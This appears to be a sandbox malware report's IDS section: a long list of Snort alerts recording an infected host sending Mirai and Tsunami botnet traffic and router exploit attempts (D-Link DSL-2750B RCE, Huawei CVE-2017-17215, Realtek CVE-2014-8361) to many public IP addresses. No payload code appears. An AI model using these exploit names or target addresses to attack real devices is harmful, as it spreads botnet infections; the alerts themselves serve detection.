            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49212 -> 54.246.138.241:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:49212 -> 54.246.138.241:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51746 -> 87.241.135.8:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43118 -> 83.169.5.154:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35952 -> 86.95.220.199:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48334 -> 86.129.74.63:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52150 -> 83.211.76.131:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36548 -> 83.69.237.40:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43680 -> 197.25.143.232:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43626 -> 88.198.95.197:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36362 -> 88.99.14.98:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58200 -> 88.198.122.210:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39618 -> 88.219.3.105:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34164 -> 88.97.144.89:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56206 -> 88.87.12.125:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51070 -> 88.204.163.130:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47774 -> 112.220.101.98:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52354 -> 5.2.88.85:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47924 -> 61.241.102.128:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41336 -> 5.129.79.151:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43580 -> 5.251.51.226:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34188 -> 5.161.109.229:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50608 -> 61.110.198.21:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50616 -> 61.110.198.21:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47372 -> 61.223.228.19:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37664 -> 2.19.246.69:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52008 -> 61.123.26.108:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48554 -> 213.55.174.191:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57834 -> 86.73.254.218:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52250 -> 86.18.52.19:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50126 -> 213.247.42.180:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57730 -> 213.182.68.201:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47874 -> 213.119.109.189:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53470 -> 2.132.135.77:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39428 -> 2.182.109.156:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43112 -> 181.52.121.14:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38696 -> 213.59.118.159:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50530 -> 14.78.183.38:7547
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35356 -> 2.23.178.77:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32968 -> 77.163.130.220:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37120 -> 213.43.27.108:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38904 -> 142.217.11.136:7547
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45820 -> 103.93.233.105:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59992 -> 193.28.249.254:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40218 -> 88.221.123.42:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41924 -> 88.99.211.27:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57282 -> 88.193.147.144:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54784 -> 88.148.91.87:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41718 -> 88.249.124.146:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52856 -> 88.12.6.78:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58570 -> 112.74.229.253:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36186 -> 156.224.116.227:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34616 -> 88.208.2.48:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38098 -> 89.144.28.112:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53198 -> 2.20.225.59:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46894 -> 89.23.255.78:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46536 -> 37.1.222.79:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58258 -> 37.59.227.55:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60416 -> 2.17.224.182:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47052 -> 2.17.137.47:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52836 -> 89.251.20.55:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45654 -> 89.133.92.213:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43696 -> 37.46.128.23:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44090 -> 86.49.88.68:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45622 -> 86.138.172.8:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39070 -> 86.183.147.122:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52658 -> 86.106.184.137:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58862 -> 82.66.59.90:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35618 -> 82.165.26.153:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33506 -> 82.100.18.49:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52240 -> 37.61.176.218:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51966 -> 82.223.14.61:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46174 -> 89.40.35.60:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:32818 -> 82.78.31.206:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37670 -> 82.223.227.39:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35170 -> 82.25.111.44:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39010 -> 82.202.211.190:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58388 -> 2.19.132.99:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46958 -> 79.118.143.157:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:46958 -> 79.118.143.157:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46952 -> 2.17.52.217:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56262 -> 73.81.42.107:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:56262 -> 73.81.42.107:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47202 -> 37.252.74.93:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48798 -> 112.16.232.50:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45512 -> 52.194.164.206:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:45512 -> 52.194.164.206:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42232 -> 112.124.157.64:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55274 -> 95.216.37.87:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44930 -> 2.55.105.115:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46242 -> 95.167.133.61:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42256 -> 122.51.126.53:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39522 -> 5.35.226.75:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58076 -> 5.105.57.202:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34354 -> 5.180.211.47:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51152 -> 37.150.232.81:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37522 -> 5.19.248.86:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54442 -> 112.124.15.206:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55516 -> 178.250.168.42:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45722 -> 178.210.90.114:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55824 -> 178.183.92.242:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42748 -> 178.205.105.230:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33376 -> 80.228.114.91:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58326 -> 80.87.225.103:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54798 -> 80.133.216.192:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54796 -> 80.133.216.192:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53186 -> 80.13.134.223:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54522 -> 80.14.206.224:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50546 -> 5.254.71.217:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51046 -> 95.100.200.19:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36474 -> 95.100.200.186:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48880 -> 112.80.248.46:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42722 -> 95.79.100.128:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36420 -> 112.34.112.108:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41436 -> 95.56.81.21:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32876 -> 95.56.88.151:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47024 -> 112.220.159.12:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59532 -> 95.156.238.9:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46600 -> 112.217.203.162:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36288 -> 112.126.102.9:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51736 -> 112.74.115.132:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46712 -> 200.69.83.25:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41570 -> 200.220.171.253:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56142 -> 52.51.101.189:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:56142 -> 52.51.101.189:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52410 -> 181.215.47.193:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50152 -> 200.98.245.16:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44068 -> 181.52.121.14:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35206 -> 181.41.202.86:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57758 -> 197.25.212.31:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:57758 -> 197.25.212.31:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58978 -> 181.179.9.26:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35636 -> 80.90.61.34:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52232 -> 80.248.211.5:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47166 -> 72.32.131.24:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:47166 -> 72.32.131.24:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52994 -> 80.249.162.209:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34240 -> 80.30.56.42:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51032 -> 181.126.209.24:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57412 -> 156.229.208.198:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41606 -> 96.85.52.166:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52016 -> 76.143.163.65:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39146 -> 142.252.140.227:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47442 -> 104.111.37.233:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41470 -> 88.99.131.203:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50114 -> 88.221.59.62:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50354 -> 95.101.201.99:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38894 -> 95.179.132.228:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44288 -> 84.247.28.228:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43146 -> 95.179.201.57:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41186 -> 88.216.212.90:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49046 -> 95.110.146.155:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47200 -> 95.217.208.243:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45258 -> 95.65.51.204:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49302 -> 95.67.46.210:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42276 -> 88.245.189.239:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55920 -> 95.143.190.34:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45212 -> 197.242.150.85:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44698 -> 23.40.26.223:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44480 -> 95.142.91.241:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41294 -> 88.208.249.163:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33936 -> 95.38.195.96:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55272 -> 80.85.21.60:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55382 -> 88.221.153.186:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55490 -> 122.228.200.113:52869
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36552 -> 112.126.102.9:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45328 -> 181.193.9.18:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34796 -> 200.234.188.123:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55508 -> 122.228.200.113:52869
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46620 -> 200.53.139.114:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43940 -> 200.71.190.26:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60482 -> 80.252.167.14:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50362 -> 80.82.116.138:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37380 -> 200.42.93.88:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60720 -> 200.61.47.203:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57004 -> 122.9.140.213:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46600 -> 122.252.13.127:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34924 -> 122.100.164.77:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44908 -> 80.154.29.247:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45490 -> 83.136.2.237:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60798 -> 200.61.47.203:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41652 -> 83.96.110.193:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41636 -> 95.102.123.40:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60382 -> 95.100.149.205:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43244 -> 95.100.66.147:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34920 -> 95.77.121.221:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52060 -> 95.79.109.204:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36518 -> 95.101.242.179:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55758 -> 95.104.78.167:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35882 -> 112.185.198.78:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39982 -> 112.184.61.160:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41648 -> 95.174.100.252:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43560 -> 95.56.29.236:80
